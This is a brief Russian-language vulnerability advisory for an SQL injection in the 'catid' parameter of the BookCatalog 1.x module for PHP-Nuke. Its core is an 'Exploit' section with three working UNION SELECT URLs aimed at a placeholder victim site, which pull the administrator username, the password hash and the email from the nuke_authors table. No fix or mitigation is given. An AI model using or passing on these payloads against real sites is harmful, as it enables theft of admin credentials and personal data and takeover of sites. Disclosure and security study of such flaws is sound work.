Программа: BookCatalog 1.x (module for PHP-Nuke)
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "catid" сценарием modules.php (когда "name"
установлен в "BookCatalog" и "op" установлен в "category") . Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
Для получения username:
www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,aid+from+nuke_authors--
Для получения password:
www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,pwd+from+nuke_authors--
Для получения E-mail:
www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,email+from+nuke_authors--
